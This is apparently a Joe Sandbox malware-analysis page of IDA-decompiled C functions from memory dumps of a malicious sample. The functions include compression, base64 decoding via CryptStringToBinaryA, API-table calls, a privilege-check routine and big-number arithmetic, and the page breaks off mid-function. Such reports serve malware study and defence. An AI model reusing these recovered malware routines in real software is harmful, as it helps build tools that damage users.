    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    C-Code - Quality: 100%
    			E003A1FE0(void* __eax, signed char* _a4, void* _a8, intOrPtr* _a12, intOrPtr _a16) {
    				unsigned int _v8;
    				signed char* _v12;
    				unsigned int _v16;
    				intOrPtr _v20;
    				void _v24;
    				int _v28;
    				signed char _v32;
    				signed int _t98;
    				signed char _t105;
    				void* _t108;
    				signed char _t109;
    				signed char _t121;
    				signed char _t122;
    				intOrPtr _t123;
    				unsigned int _t124;
    				unsigned int _t125;
    				signed char _t127;
    				signed char _t132;
    				unsigned int _t135;
    				int _t139;
    				signed int _t141;
    				unsigned int _t143;
    				signed char* _t145;
    				signed char* _t146;
    				void* _t148;
    				void _t149;
    				signed char** _t157;
    				unsigned int _t159;
    				unsigned int _t160;
    				unsigned int _t162;
    				signed char _t164;
    				signed char _t165;
    				signed char _t166;
    				void _t168;
    				intOrPtr _t171;
    				intOrPtr _t174;
    				unsigned int _t176;
    				unsigned int _t177;
    				signed char* _t179;
    				int _t189;
    				int _t193;
    				unsigned int _t195;
    				signed char* _t196;
    				signed char* _t197;
    				signed char* _t198;
    				void* _t199;
    				char* _t201;
    				void* _t202;
    
    				_t199 = _a8;
    				_t196 = _a4;
    				_v12 = _t196;
    				_v20 = _t196 + __eax;
    				_t197 = _t196 + 4;
    				do {
    					_t174 = _a16;
    					_t98 = ((((_t197[3] & 0x000000ff) << 0x00000006 ^ _t197[2] & 0x000000ff) << 0x00000005 ^ _t197[1] & 0x000000ff) << 0x00000005 ^  *_t197 & 0x000000ff) + (((((_t197[3] & 0x000000ff) << 0x00000006 ^ _t197[2] & 0x000000ff) << 0x00000005 ^ _t197[1] & 0x000000ff) << 0x00000005 ^  *_t197 & 0x000000ff) << 0x00000005) >> 0x00000005 & 0x00003fff;
    					_t145 =  *(_t174 + _t98 * 4);
    					_t157 = _t174 + _t98 * 4;
    					if(_t145 < _a4) {
    						L49:
    						 *_t157 = _t197;
    						_t197 =  &(_t197[1]);
    						goto L50;
    					}
    					_t176 = _t197 - _t145;
    					_v8 = _t176;
    					_t177 = _t176 - 1;
    					_v24 = _t197;
    					_v16 = _t177;
    					if(_t177 > 0xbffe) {
    						goto L49;
    					}
    					if(_v8 <= 0x800 || _t145[3] == _t197[3]) {
    						L9:
    						if( *_t145 !=  *_t197 || _t145[2] != _t197[2]) {
    							goto L49;
    						} else {
    							_t179 = _v12;
    							_t105 = _t197 - _t179;
    							 *_t157 = _t197;
    							if(_t105 <= 0) {
    								L23:
    								_t198 =  &(_t197[4]);
    								if(_t145[3] != _t197[3]) {
    									L43:
    									_t159 = _v8;
    									_t197 = _t198 - 1;
    									_t108 = _t197 - _t179;
    									if(_t159 > 0x800) {
    										_t109 = _t108 - 2;
    										if(_t159 > 0x4000) {
    											_t160 = _t159 - 0x4000;
    											 *_t199 = _t160 >> 0x0000000b & 0x00000008 | _t109 | 0x00000010;
    										} else {
    											_t160 = _v16;
    											_v8 = _t160;
    											 *_t199 = _t109 | 0x00000020;
    										}
    										L48:
    										_t201 = _t199 + 1;
    										 *_t201 = _t160 + _t160 + _t160 + _t160;
    										 *((char*)(_t201 + 1)) = _t160 >> 6;
    										_t199 = _t201 + 2;
    										_v12 = _t197;
    										goto L50;
    									}
    									_t162 = _v16;
    									 *_t199 = (_t108 - 0x00000001 + _t108 - 0x00000001 + _t108 - 0x00000001 + _t108 - 0x00000001 + _t108 - 0x00000001 + _t108 - 0x00000001 + _t108 - 0x00000001 + _t108 - 0x00000001 | _t162 & 0x00000007) + (_t108 - 0x00000001 + _t108 - 0x00000001 + _t108 - 0x00000001 + _t108 - 0x00000001 + _t108 - 0x00000001 + _t108 - 0x00000001 + _t108 - 0x00000001 + _t108 - 0x00000001 | _t162 & 0x00000007) + (_t108 - 0x00000001 + _t108 - 0x00000001 + _t108 - 0x00000001 + _t108 - 0x00000001 + _t108 - 0x00000001 + _t108 - 0x00000001 + _t108 - 0x00000001 + _t108 - 0x00000001 | _t162 & 0x00000007) + (_t108 - 0x00000001 + _t108 - 0x00000001 + _t108 - 0x00000001 + _t108 - 0x00000001 + _t108 - 0x00000001 + _t108 - 0x00000001 + _t108 - 0x00000001 + _t108 - 0x00000001 | _t162 & 0x00000007);
    									 *(_t199 + 1) = _t162 >> 3;
    									_t199 = _t199 + 2;
    									_v12 = _t197;
    									goto L50;
    								}
    								_t164 =  *_t198;
    								_t198 =  &(_t198[1]);
    								if(_t145[4] != _t164) {
    									goto L43;
    								}
    								_t121 =  *_t198;
    								_t198 =  &(_t198[1]);
    								if(_t145[5] != _t121) {
    									goto L43;
    								}
    								_t165 =  *_t198;
    								_t198 =  &(_t198[1]);
    								if(_t145[6] != _t165) {
    									goto L43;
    								}
    								_t122 =  *_t198;
    								_t198 =  &(_t198[1]);
    								if(_t145[7] != _t122) {
    									goto L43;
    								}
    								_t166 =  *_t198;
    								_t198 =  &(_t198[1]);
    								if(_t145[8] != _t166) {
    									goto L43;
    								}
    								_t123 = _v20;
    								_t146 =  &(_t145[9]);
    								if(_t198 >= _t123) {
    									L32:
    									_t124 = _v8;
    									_t148 = _t198 - _v12;
    									if(_t124 > 0x4000) {
    										_t125 = _t124 - 0x4000;
    										_v8 = _t125;
    										_t127 = _t125 >> 0x0000000b & 0x00000008;
    										if(_t148 > 9) {
    											_t149 = _t148 - 9;
    											 *_t199 = _t127 | 0x00000010;
    											L39:
    											_t199 = _t199 + 1;
    											if(_t149 <= 0xff) {
    												L42:
    												_t160 = _v8;
    												 *_t199 = _t149;
    												goto L48;
    											}
    											_t67 = _t149 - 0x100; // -285
    											_t189 = (0x80808081 * _t67 >> 0x20 >> 7) + 1;
    											_v32 = _t189;
    											memset(_t199, 0, _t189);
    											_t132 = _v32;
    											_t202 = _t202 + 0xc;
    											_t199 = _t199 + _t132;
    											do {
    												_t149 = _t149 - 0xff;
    												_t132 = _t132 - 1;
    											} while (_t132 != 0);
    											goto L42;
    										}
    										_t160 = _v8;
    										 *_t199 = _t127 | _t148 - 0x00000002 | 0x00000010;
    										goto L48;
    									}
    									_t135 = _v16;
    									_v8 = _t135;
    									if(_t148 > 0x21) {
    										_t149 = _t148 - 0x21;
    										 *_t199 = 0x20;
    										goto L39;
    									}
    									 *_t199 = _t148 - 0x00000002 | 0x00000020;
    									_t160 = _t135;
    									goto L48;
    								}
    								while( *_t146 ==  *_t198) {
    									_t198 =  &(_t198[1]);
    									_t146 =  &(_t146[1]);
    									if(_t198 < _t123) {
    										continue;
    									}
    									goto L32;
    								}
    								goto L32;
    							}
    							_v32 = _t105;
    							if(_t105 > 3) {
    								if(_t105 > 0x12) {
    									_t39 = _t105 - 0x12; // -18
    									_t168 = _t39;
    									 *_t199 = 0;
    									_t199 = _t199 + 1;
    									_v24 = _t168;
    									if(_t168 <= 0xff) {
    										L20:
    										 *_t199 = _t168;
    										_t199 = _t199 + 1;
    										do {
    											L21:
    											 *_t199 =  *_t179;
    											_t199 = _t199 + 1;
    											_t179 = _t179 + 1;
    											_t105 = _t105 - 1;
    										} while (_t105 != 0);
    										_v12 = _t179;
    										goto L23;
    									}
    									_t193 = (0x80808081 * (_t168 + 0xffffff00) >> 0x20 >> 7) + 1;
    									_v28 = _t193;
    									memset(_t199, 0, _t193);
    									_t139 = _v28;
    									_t202 = _t202 + 0xc;
    									_t199 = _t199 + _t139;
    									do {
    										_v24 = _v24 - 0xff;
    										_t139 = _t139 - 1;
    									} while (_t139 != 0);
    									_t179 = _v12;
    									_t168 = _v24;
    									_t105 = _v32;
    									goto L20;
    								}
    								_t38 = _t105 - 3; // -3
    								_t168 = _t38;
    								goto L20;
    							}
    							 *(_t199 - 2) =  *(_t199 - 2) | _t105;
    							goto L21;
    						}
    					} else {
    						_t171 = _a16;
    						_t141 = _t98 & 0x000007ff ^ 0x0000201f;
    						_t145 =  *(_t171 + _t141 * 4);
    						_t157 = _t171 + _t141 * 4;
    						if(_t145 < _a4) {
    							goto L49;
    						}
    						_t143 = _t197 - _t145;
    						_t27 = _t143 - 1; // -1
    						_t195 = _t27;
    						_v8 = _t143;
    						_v16 = _t195;
    						if(_t195 > 0xbffe || _t143 > 0x800 && _t145[3] != _t197[3]) {
    							goto L49;
    						} else {
    							goto L9;
    						}
    					}
    					L50:
    				} while (_t197 < _v20 + 0xfffffff3);
    				 *_a12 = _t199 - _a8;
    				return _v20 - _v12;
    			}




















































    APIs
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    C-Code - Quality: 67%
    			E0039BA40(void* __ecx, intOrPtr _a4, char _a8, intOrPtr* _a12, intOrPtr* _a16) {
    				char _v8;
    				void* _t15;
    				intOrPtr _t18;
    				void* _t23;
    				intOrPtr _t24;
    				intOrPtr _t33;
    				void* _t36;
    				intOrPtr _t37;
    				intOrPtr _t42;
    
    				_t24 = _a4;
    				_t3 =  &_a8; // 0x3a094a
    				_t37 =  *_t3;
    				 *_a16 = 0;
    				_t33 =  *0x3b8628; // 0x593938
    				_v8 = 0;
    				_t15 =  *((intOrPtr*)( *((intOrPtr*)(_t33 + 0x1cc))))(_t24, _t37, 1, 0,  &_v8, 0, 0, _t36, _t23, __ecx);
    				if(_t15 != 0) {
    					_t42 = E003A1D90(_v8, 0);
    					if(_t42 == 0) {
    						L5:
    						return 0;
    					} else {
    						_t18 =  *0x3b8628; // 0x593938
    						_push(0);
    						_push(0);
    						_push( &_v8);
    						_push(_t42);
    						_push(7);
    						_push(_t37);
    						_push(_t24);
    						if( *((intOrPtr*)( *((intOrPtr*)(_t18 + 0x1cc))))() != 0) {
    							 *_a12 = _t42;
    							 *_a16 = _v8;
    							return 1;
    						} else {
    							E0039BB40(_t42);
    							goto L5;
    						}
    					}
    				} else {
    					return _t15;
    				}
    			}













    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    C-Code - Quality: 48%
    			E003B1FF0(signed int __eax, void* __ecx, intOrPtr _a4) {
    				intOrPtr _v8;
    				char _v12;
    				signed int _v16;
    				intOrPtr _v20;
    				intOrPtr _v24;
    				char _v28;
    				intOrPtr _t28;
    				intOrPtr _t31;
    				intOrPtr _t33;
    
    				_t31 =  *0x3b8628; // 0x593938
    				_push( &_v12);
    				_push(0);
    				if( *((intOrPtr*)( *((intOrPtr*)(_t31 + 0x188))))() != 0) {
    					_push(0);
    					_push(0);
    					_push(0x10);
    					_push( &_v28);
    					asm("sbb esi, esi");
    					_v24 = _v12;
    					_v20 = _v8;
    					_t33 =  *0x3b8628; // 0x593938
    					_push(0);
    					_v28 = 1;
    					_v16 =  ~__eax & 0x00000002;
    					_push(_a4);
    					if( *((intOrPtr*)( *((intOrPtr*)(_t33 + 0x18c))))() == 0) {
    						goto L1;
    					} else {
    						_t28 =  *0x3b8628; // 0x593938
    						return 0 |  *((intOrPtr*)( *((intOrPtr*)(_t28 + 0x30))))() != 0x00000514;
    					}
    				} else {
    					L1:
    					return 0;
    				}
    			}













    Strings
    C-Code - Quality: 86%
    			E003A5853(void* __ecx, char* _a4, BYTE* _a8) {
    				int _v8;
    				intOrPtr* _t8;
    				signed int _t10;
    				intOrPtr _t15;
    				void* _t18;
    
    				_t8 = _a4;
    				_v8 = 0x400;
    				_t18 = _t8 + 1;
    				do {
    					_t15 =  *_t8;
    					_t8 = _t8 + 1;
    				} while (_t15 != 0);
    				_t10 = CryptStringToBinaryA(_a4, _t8 - _t18, 0, _a8,  &_v8, 0, 0);
    				asm("sbb eax, eax");
    				return  ~_t10 & _v8;
    			}









    APIs
    • CryptStringToBinaryA.CRYPT32(?,?,00000000,?,00000400,00000000,00000000), ref: 003A587E
    C-Code - Quality: 87%
    			E003A3933(int __eax, void* __ecx, char* _a4, BYTE* _a8) {
    				int _v8;
    				intOrPtr* _t9;
    				signed int _t11;
    				void* _t15;
    				intOrPtr _t17;
    
    				_v8 = __eax;
    				_t9 = _a4;
    				_t3 = _t9 + 1; // 0x1
    				_t15 = _t3;
    				do {
    					_t17 =  *_t9;
    					_t9 = _t9 + 1;
    				} while (_t17 != 0);
    				_t11 = CryptStringToBinaryA(_a4, _t9 - _t15, 1, _a8,  &_v8, 0, 0);
    				asm("sbb eax, eax");
    				return  ~_t11 & _v8;
    			}









    APIs
    • CryptStringToBinaryA.CRYPT32(00000000,00000001,00000001,00000000,?,00000000,00000000), ref: 003A395A
    C-Code - Quality: 81%
    			E0039F310(intOrPtr _a4, char _a8, signed short** _a12, signed short** _a16) {
    				intOrPtr _t16;
    				void* _t17;
    				signed short* _t23;
    				intOrPtr _t28;
    				signed short* _t32;
    				intOrPtr _t36;
    				signed int _t38;
    				char _t40;
    				signed short* _t42;
    
    				_t28 = _a4;
    				_t40 = _a8;
    				 *_a12 = 0;
    				 *_a16 = 0;
    				_t16 =  *0x3b8628; // 0x593938
    				_t17 =  *((intOrPtr*)( *((intOrPtr*)(_t16 + 0x1d0))))(_t28, _t40, 1, 0,  &_a8);
    				if(_t17 != 0) {
    					_t42 = E003A1D90(_a8 + _a8, 0);
    					if(_t42 == 0) {
    						L5:
    						return 0;
    					} else {
    						_t36 =  *0x3b8628; // 0x593938
    						_push( &_a8);
    						_push(_t42);
    						_push(0x80000001);
    						_push(_t40);
    						_push(_t28);
    						if( *((intOrPtr*)( *((intOrPtr*)(_t36 + 0x1d0))))() != 0) {
    							_t23 = _t42;
    							_t32 = _t42;
    							do {
    								if( *_t23 == 0xa) {
    									_t23 =  &(_t23[1]);
    								}
    								 *_t32 =  *_t23 & 0x0000ffff;
    								_t38 =  *_t23 & 0x0000ffff;
    								_t32 =  &(_t32[1]);
    								_t23 =  &(_t23[1]);
    							} while (_t38 != 0);
    							 *_a12 = _t42;
    							 *_a16 = _a8 + _a8;
    							return 1;
    						} else {
    							E0039BB40(_t42);
    							goto L5;
    						}
    					}
    				} else {
    					return _t17;
    				}
    			}













    Strings
    C-Code - Quality: 100%
    			E003AE04D(void* __eax, signed int __ebx, signed int __edx, intOrPtr* __esi) {
    				void* _t410;
    				void* _t412;
    				signed int _t413;
    				signed int _t420;
    				signed int _t424;
    				signed int _t426;
    				signed int _t427;
    				void* _t428;
    				signed int _t430;
    				signed int _t431;
    				signed int _t434;
    				signed int _t435;
    				signed int _t436;
    				signed int _t437;
    				signed int _t440;
    				signed int _t445;
    				signed int _t455;
    				signed int _t457;
    				signed int _t458;
    				signed int _t459;
    				void* _t460;
    				void* _t465;
    				signed int _t466;
    				signed int _t467;
    				intOrPtr _t470;
    				signed int _t471;
    				signed int _t472;
    				signed int _t473;
    				signed int _t478;
    				signed int* _t479;
    				signed int _t481;
    				unsigned int _t483;
    				unsigned int _t484;
    				signed int _t485;
    				signed int _t486;
    				signed int _t487;
    				intOrPtr _t489;
    				signed int _t491;
    				signed int _t492;
    				signed int _t495;
    				signed int _t497;
    				signed int _t498;
    				intOrPtr _t503;
    				signed int _t504;
    				signed int _t506;
    				signed int _t507;
    				signed int _t517;
    				signed int* _t518;
    				signed int _t520;
    				unsigned int _t522;
    				unsigned int _t523;
    				signed int _t524;
    				signed int _t525;
    				signed int _t526;
    				intOrPtr _t528;
    				signed int _t530;
    				signed int _t531;
    				signed int _t534;
    				signed int _t536;
    				signed int _t537;
    				intOrPtr _t542;
    				signed int _t543;
    				signed int _t545;
    				signed int _t546;
    				signed int _t558;
    				signed int _t560;
    				signed int _t562;
    				signed int _t563;
    				void* _t564;
    				void* _t568;
    				signed int _t571;
    				intOrPtr* _t573;
    				signed int _t574;
    				void* _t575;
    				signed int _t579;
    				signed int _t582;
    				signed int _t585;
    				signed int* _t586;
    				signed int _t588;
    				signed int _t589;
    				unsigned int _t597;
    				signed int _t598;
    				intOrPtr _t599;
    				signed int _t610;
    				signed int _t618;
    				signed int* _t619;
    				signed int _t621;
    				signed int _t622;
    				unsigned int _t630;
    				signed int _t631;
    				intOrPtr _t632;
    				signed int _t643;
    				signed int _t667;
    				signed int _t668;
    				signed int _t669;
    				signed int _t677;
    				signed int _t678;
    				signed int _t679;
    				void* _t691;
    				signed int _t695;
    				signed int _t697;
    				signed int _t698;
    				void* _t700;
    				signed int _t701;
    				signed int _t704;
    				signed int _t707;
    				intOrPtr _t708;
    				intOrPtr _t709;
    				signed int _t712;
    				signed int _t714;
    				signed int _t718;
    				intOrPtr _t721;
    				signed int _t724;
    				signed int _t726;
    				signed int _t730;
    				intOrPtr* _t734;
    				signed int _t736;
    				signed int _t737;
    				signed int _t741;
    				signed int _t742;
    				intOrPtr _t745;
    				signed int _t747;
    				signed int _t751;
    				void* _t755;
    				void* _t757;
    				void* _t758;
    				void* _t760;
    				void* _t761;
    
    				_t734 = __esi;
    				_t758 = _t757 + 0xc;
    				if(__eax == 0) {
    					L102:
    					E003AA6BB( *((intOrPtr*)(_t755 + 0x10)));
    					return  *(_t755 - 0x38);
    				}
    				_t410 = E003AA920(__edx,  *(_t755 - 4),  *(_t755 - 4), 0x20);
    				_t760 = _t758 + 0xc;
    				if(_t410 == 0) {
    					goto L102;
    				}
    				_t411 =  *(_t755 - 4);
    				if( *((intOrPtr*)( *(_t755 - 4) + 4)) == __ebx) {
    					__eflags = __ebx | 0xffffffff;
    					_t412 = E003A6732(_t411, __ebx | 0xffffffff);
    				} else {
    					_t412 = E003ABF04(_t411);
    				}
    				if(_t412 == 0) {
    					goto L102;
    				} else {
    					_t562 =  *(_t755 - 4);
    					_t413 =  *(_t562 + 4);
    					 *(_t755 - 0x14) =  *(_t755 - 0x14) & 0x00000000;
    					if(_t413 <= 0) {
    						L9:
    						if(( *(_t562 + 0x10) & 0x00000004) != 0 || ( *(_t755 - 0x50) & 0x00000004) != 0) {
    							 *(_t755 - 0x14) = 1;
    						}
    						if( *((intOrPtr*)(_t755 - 0x5c)) == 0) {
    							goto L102;
    						} else {
    							if( *(_t755 - 0x14) != 0) {
    								L16:
    								_t690 =  *((intOrPtr*)(_t755 + 0x10));
    								E003AA694( *((intOrPtr*)(_t755 + 0x10)));
    								 *(_t755 - 0x20) = E003AA715( *((intOrPtr*)(_t755 + 0x10)));
    								_t558 = E003AA715( *((intOrPtr*)(_t755 + 0x10)));
    								_t420 = E003AA715(_t690);
    								__eflags =  *(_t755 - 0x20);
    								_t736 = _t420;
    								 *(_t755 - 0x1c) = _t736;
    								if( *(_t755 - 0x20) == 0) {
    									L179:
    									E003AA6BB( *((intOrPtr*)(_t755 + 0x10)));
    									goto L102;
    								}
    								__eflags = _t558;
    								if(_t558 == 0) {
    									goto L179;
    								}
    								__eflags = _t736;
    								if(_t736 == 0) {
    									goto L179;
    								}
    								_t651 = _t755 - 0x60;
    								_t424 = E003A6518(_t755 - 0x60) & 0x8000001f;
    								__eflags = _t424;
    								if(_t424 < 0) {
    									_t424 = (_t424 - 0x00000001 | 0xffffffe0) + 1;
    									__eflags = _t424;
    								}
    								_t691 = 0x20;
    								_t692 = _t691 - _t424;
    								_t426 = E003AA920(_t651, _t736, _t755 - 0x60, _t691 - _t424);
    								_t761 = _t760 + 0xc;
    								__eflags = _t426;
    								if(_t426 == 0) {
    									goto L179;
    								} else {
    									 *(_t736 + 0xc) =  *(_t736 + 0xc) & 0x00000000;
    									_t427 = E003AA920(_t651, _t558,  *(_t755 - 4), _t692 + 0x20);
    									_t760 = _t761 + 0xc;
    									__eflags = _t427;
    									if(_t427 == 0) {
    										goto L179;
    									}
    									 *(_t558 + 0xc) =  *(_t558 + 0xc) & 0x00000000;
    									__eflags =  *(_t755 - 0x14);
    									if( *(_t755 - 0x14) == 0) {
    										L38:
    										_t563 =  *(_t755 - 0x1c);
    										_t737 =  *(_t563 + 4);
    										_t428 =  *_t558;
    										_t564 =  *_t563;
    										 *(_t755 - 0x68) =  *(_t755 - 0x68) & 0x00000000;
    										_t695 =  *(_t558 + 4) - _t737;
    										 *((intOrPtr*)(_t755 - 0x74)) = _t428 + _t695 * 4;
    										 *((intOrPtr*)(_t755 - 0x6c)) =  *((intOrPtr*)(_t558 + 8)) - _t695;
    										 *(_t755 - 0x64) =  *(_t558 + 0x10) | 0x00000002;
    										 *(_t755 - 0x30) = _t737;
    										 *(_t755 - 0x2c) = _t695;
    										 *(_t755 - 0x70) = _t737;
    										 *(_t755 - 0x18) =  *(_t564 + _t737 * 4 - 4);
    										__eflags = _t737 - 1;
    										if(_t737 != 1) {
    											 *(_t755 - 0x28) =  *(_t564 + _t737 * 4 - 8);
    										} else {
    											 *(_t755 - 0x28) =  *(_t755 - 0x28) & 0x00000000;
    										}
    										 *(_t755 - 0x10) = _t428 +  *(_t558 + 4) * 4 - 4;
    										_t430 =  *(_t755 - 4);
    										 *(_t430 + 0xc) =  *(_t430 + 0xc) ^  *(_t755 - 0x54);
    										_t568 = _t695 + 1;
    										__eflags = _t568 -  *((intOrPtr*)(_t430 + 8));
    										if(_t568 >  *((intOrPtr*)(_t430 + 8))) {
    											_t430 = E003A665B(_t568, _t430);
    											_t695 =  *(_t755 - 0x2c);
    											_t737 =  *(_t755 - 0x30);
    										}
    										__eflags = _t430;
    										if(_t430 == 0) {
    											goto L179;
    										} else {
    											_t431 =  *(_t755 - 4);
    											 *((intOrPtr*)(_t431 + 4)) = _t695 -  *(_t755 - 0x14);
    											_t571 =  *(_t755 - 0x20);
    											 *(_t755 - 0xc) =  *_t431 + _t695 * 4 - 4;
    											_t434 = _t737 + 1;
    											 *(_t755 - 0x34) = _t434;
    											__eflags = _t434 -  *((intOrPtr*)(_t571 + 8));
    											if(_t434 >  *((intOrPtr*)(_t571 + 8))) {
    												_t435 = E003A665B( *(_t755 - 0x34), _t571);
    												_t695 =  *(_t755 - 0x2c);
    												_t737 =  *(_t755 - 0x30);
    											} else {
    												_t435 = _t571;
    											}
    											__eflags = _t435;
    											if(_t435 == 0) {
    												goto L179;
    											} else {
    												__eflags =  *(_t755 - 0x14);
    												if( *(_t755 - 0x14) == 0) {
    													_t536 = E003A687A(_t755 - 0x74,  *(_t755 - 0x1c));
    													__eflags = _t536;
    													if(_t536 < 0) {
    														_t537 =  *(_t755 - 4);
    														_t118 = _t537 + 4;
    														 *_t118 =  *(_t537 + 4) - 1;
    														__eflags =  *_t118;
    													} else {
    														E003A70EC( *((intOrPtr*)(_t755 - 0x74)),  *((intOrPtr*)(_t755 - 0x74)),  *( *(_t755 - 0x1c)), _t737);
    														 *( *(_t755 - 0xc)) = 1;
    													}
    												}
    												_t436 =  *(_t755 - 4);
    												__eflags =  *(_t436 + 4);
    												if( *(_t436 + 4) != 0) {
    													_t124 = _t755 - 0xc;
    													 *_t124 =  *(_t755 - 0xc) - 4;
    													__eflags =  *_t124;
    												} else {
    													 *(_t436 + 0xc) =  *(_t436 + 0xc) & 0x00000000;
    												}
    												_t697 = _t695 - 1;
    												__eflags = _t697;
    												if(_t697 <= 0) {
    													L76:
    													_t437 =  *(_t558 + 4);
    													_t658 = 0;
    													__eflags = _t437;
    													if(_t437 <= 0) {
    														L80:
    														__eflags =  *(_t755 - 0x14) - _t658;
    														if( *(_t755 - 0x14) == _t658) {
    															L85:
    															E003AA6BB( *((intOrPtr*)(_t755 + 0x10)));
    															_t734 =  *((intOrPtr*)(_t755 + 8));
    															_t698 =  *(_t755 - 4);
    															L86:
    															if( *((intOrPtr*)(_t698 + 4)) <= 0) {
    																_t440 = 0;
    																__eflags = 0;
    															} else {
    																_t440 =  *((intOrPtr*)( *_t698));
    															}
    															 *(_t734 + 0x44) =  *(_t734 + 0x44) & 0x00000000;
    															 *((intOrPtr*)(_t734 + 0x40)) = _t440;
    															E003A6732( *((intOrPtr*)(_t755 - 8)), 0);
    															_t740 =  *_t734 +  *_t734;
    															if( *_t734 +  *_t734 < 0 || E003A68B4( *((intOrPtr*)(_t755 - 8)), _t740, _t658) == 0) {
    																goto L102;
    															} else {
    																_t573 =  *((intOrPtr*)(_t755 - 8));
    																_t445 =  *(_t573 + 4);
    																 *(_t755 - 0x10) =  *(_t755 - 0x10) & 0;
    																if(_t445 <= 0) {
    																	L94:
    																	if(( *(_t573 + 0x10) & 0x00000004) != 0 || ( *( *((intOrPtr*)(_t755 - 0x24)) + 0x10) & 0x00000004) != 0) {
    																		 *(_t755 - 0x10) = 1;
    																	}
    																	_t446 =  *((intOrPtr*)(_t755 - 0x24));
    																	if( *((intOrPtr*)( *((intOrPtr*)(_t755 - 0x24)) + 4)) == 0) {
    																		goto L102;
    																	} else {
    																		if( *(_t755 - 0x10) != 0 || E003A687A( *((intOrPtr*)(_t755 - 8)), _t446) >= 0) {
    																			_t699 =  *((intOrPtr*)(_t755 + 0x10));
    																			E003AA694( *((intOrPtr*)(_t755 + 0x10)));
    																			 *(_t755 - 0x18) = E003AA715( *((intOrPtr*)(_t755 + 0x10)));
    																			_t560 = E003AA715( *((intOrPtr*)(_t755 + 0x10)));
    																			_t741 = E003AA715(_t699);
    																			 *(_t755 - 0x1c) = _t741;
    																			_t455 = E003AA715(_t699);
    																			__eflags =  *(_t755 - 0x18);
    																			 *(_t755 - 4) = _t455;
    																			if( *(_t755 - 0x18) == 0) {
    																				goto L179;
    																			}
    																			__eflags = _t560;
    																			if(_t560 == 0) {
    																				goto L179;
    																			}
    																			__eflags = _t741;
    																			if(_t741 == 0) {
    																				goto L179;
    																			}
    																			__eflags = _t455;
    																			if(_t455 == 0) {
    																				goto L179;
    																			}
    																			_t659 =  *((intOrPtr*)(_t755 - 0x24));
    																			_t457 = E003A6518( *((intOrPtr*)(_t755 - 0x24))) & 0x8000001f;
    																			__eflags = _t457;
    																			if(_t457 < 0) {
    																				_t457 = (_t457 - 0x00000001 | 0xffffffe0) + 1;
    																				__eflags = _t457;
    																			}
    																			_t700 = 0x20;
    																			_t701 = _t700 - _t457;
    																			_t458 = E003AA920(_t659, _t741, _t659, _t701);
    																			__eflags = _t458;
    																			if(_t458 == 0) {
    																				goto L179;
    																			} else {
    																				 *(_t741 + 0xc) =  *(_t741 + 0xc) & 0x00000000;
    																				 *((intOrPtr*)(_t755 - 0x48)) = _t701 + 0x20;
    																				_t459 = E003AA920(_t659, _t560,  *((intOrPtr*)(_t755 - 8)), _t701 + 0x20);
    																				__eflags = _t459;
    																				if(_t459 == 0) {
    																					goto L179;
    																				}
    																				 *(_t560 + 0xc) =  *(_t560 + 0xc) & 0x00000000;
    																				__eflags =  *(_t755 - 0x10);
    																				if( *(_t755 - 0x10) == 0) {
    																					L128:
    																					_t574 =  *(_t755 - 0x1c);
    																					_t742 =  *(_t574 + 4);
    																					_t460 =  *_t560;
    																					_t575 =  *_t574;
    																					 *(_t755 - 0x68) =  *(_t755 - 0x68) & 0x00000000;
    																					_t704 =  *(_t560 + 4) - _t742;
    																					 *((intOrPtr*)(_t755 - 0x74)) = _t460 + _t704 * 4;
    																					 *((intOrPtr*)(_t755 - 0x6c)) =  *((intOrPtr*)(_t560 + 8)) - _t704;
    																					 *(_t755 - 0x64) =  *(_t560 + 0x10) | 0x00000002;
    																					_t665 =  *(_t575 + _t742 * 4 - 4);
    																					 *(_t755 - 0x30) = _t742;
    																					 *(_t755 - 0x34) = _t704;
    																					 *(_t755 - 0x70) = _t742;
    																					 *(_t755 - 0x20) =  *(_t575 + _t742 * 4 - 4);
    																					__eflags = _t742 - 1;
    																					if(_t742 != 1) {
    																						 *(_t755 - 0x2c) =  *(_t575 + _t742 * 4 - 8);
    																					} else {
    																						 *(_t755 - 0x2c) =  *(_t755 - 0x2c) & 0x00000000;
    																					}
    																					 *(_t755 - 0x14) = _t460 +  *(_t560 + 4) * 4 - 4;
    																					_t579 =  *(_t755 - 4);
    																					 *(_t579 + 0xc) =  *( *((intOrPtr*)(_t755 - 0x24)) + 0xc) ^  *( *((intOrPtr*)(_t755 - 8)) + 0xc);
    																					_t465 = _t704 + 1;
    																					__eflags = _t465 -  *((intOrPtr*)(_t579 + 8));
    																					if(_t465 >  *((intOrPtr*)(_t579 + 8))) {
    																						_t466 = E003A665B(_t465,  *(_t755 - 4));
    																						_t704 =  *(_t755 - 0x34);
    																						_t742 =  *(_t755 - 0x30);
    																					} else {
    																						_t466 = _t579;
    																					}
    																					__eflags = _t466;
    																					if(_t466 == 0) {
    																						goto L179;
    																					} else {
    																						_t467 =  *(_t755 - 4);
    																						 *((intOrPtr*)(_t467 + 4)) = _t704 -  *(_t755 - 0x10);
    																						_t582 =  *(_t755 - 0x18);
    																						 *(_t755 - 0x28) =  *_t467 + _t704 * 4 - 4;
    																						_t470 = _t742 + 1;
    																						 *((intOrPtr*)(_t755 - 0x24)) = _t470;
    																						__eflags = _t470 -  *((intOrPtr*)(_t582 + 8));
